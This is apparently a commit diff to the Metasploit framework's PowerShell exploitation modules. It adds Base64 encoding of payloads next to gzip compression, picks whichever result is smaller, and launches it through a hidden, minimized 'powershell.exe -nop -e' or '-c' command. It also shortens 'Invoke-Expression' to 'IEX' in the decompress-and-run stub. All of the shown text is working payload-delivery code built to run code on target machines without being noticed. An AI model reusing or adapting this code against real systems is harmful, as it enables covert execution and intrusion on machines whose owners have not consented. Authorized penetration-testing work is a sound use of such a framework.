Choose smallest smallest

lib/msf/core/exploit/powershell.rb

@@ -61,6 +61,20 @@ module Exploit::Powershell
     return new_subs
   end
 
+  #
+  # Return an encoded powershell script
+  # Will invoke PSH modifiers as enabled
+  #
+  def encode_script(script_in, eof = nil)
+    # Build script object
+    psh = PshScript.new(script_in)
+    # Invoke enabled modifiers
+    datastore.select {|k,v| k =~ /^PSH::(strip|sub)/ and v == 'true' }.keys.map do |k|
+      mod_method = k.split('::').last.intern
+      psh.send(mod_method)
+    end
+    return psh.encode_code(eof)
+  end
   #
   # Return a gzip compressed powershell script
   # Will invoke PSH modifiers as enabled
@@ -80,7 +94,7 @@ module Exploit::Powershell
   # Runs powershell in hidden window raising interactive proc msg
   #
   def run_hidden_psh(ps_code,ps_bin='powershell.exe')
-    ps_args = "-w hidden -nop -e #{ compress_script(ps_code) }"
+    ps_args = "-w hidden -nop -e #{ps_code}"
 
     ps_wrapper = <<EOS
 $si=New-Object System.Diagnostics.ProcessStartInfo
@@ -116,10 +130,22 @@ EOS
     end
     # Determine appropriate architecture, manual method reduces script size
 		ps_bin = wow64 ? '$env:windir+\'\syswow64\WindowsPowerShell\v1.0\powershell.exe\'' : '\'powershell.exe\''
+
+
+    compressed = compress_script(psh_payload)
+    encoded = encode_script(psh_payload)
+
+    if (encoded.length <= compressed.length)
+      smallest_payload = encoded
+    else
+      smallest_payload = compressed
+    end
+
     # Wrap in hidden runtime
-    psh_payload = run_hidden_psh(psh_payload,ps_bin)
+    final_payload = run_hidden_psh(smallest_payload,ps_bin)
+
     # Convert to base64 for -encodedcommand execution
-    command = "%COMSPEC% /B /C start /min powershell.exe -nop -c #{psh_payload}\r\n"
+    command = "%COMSPEC% /B /C start /min powershell.exe -nop -c #{final_payload}\r\n"
   end
 
 

lib/rex/exploitation/powershell.rb

@@ -28,7 +28,18 @@ module Powershell
 			end
 			return numbered
 		end
+    #
+    # Return a Base64 encoded powershell code
+    #
+    def encode_code(eof = nil)
+      # Convert expression to unicode
+      unicode_expression = Rex::Text.to_unicode(code)
 
+      # Base64 encode the unicode expression
+      @code = Rex::Text.encode_base64(unicode_expression)
+
+      return code
+    end
 		#
 		# Return a zlib compressed powershell code
 		#
@@ -44,7 +55,7 @@ module Powershell
 			psh_expression =  "$stream = New-Object IO.MemoryStream(,"
 			psh_expression << "$([Convert]::FromBase64String('#{encoded_stream}')));"
 			# Uncompress and invoke the expression (execute)
-			psh_expression << "$(Invoke-Expression $(New-Object IO.StreamReader("
+			psh_expression << "$(IEX $(New-Object IO.StreamReader("
 			psh_expression << "$(New-Object IO.Compression.GzipStream("
 			psh_expression << "$stream,"
 			psh_expression << "[IO.Compression.CompressionMode]::Decompress)),"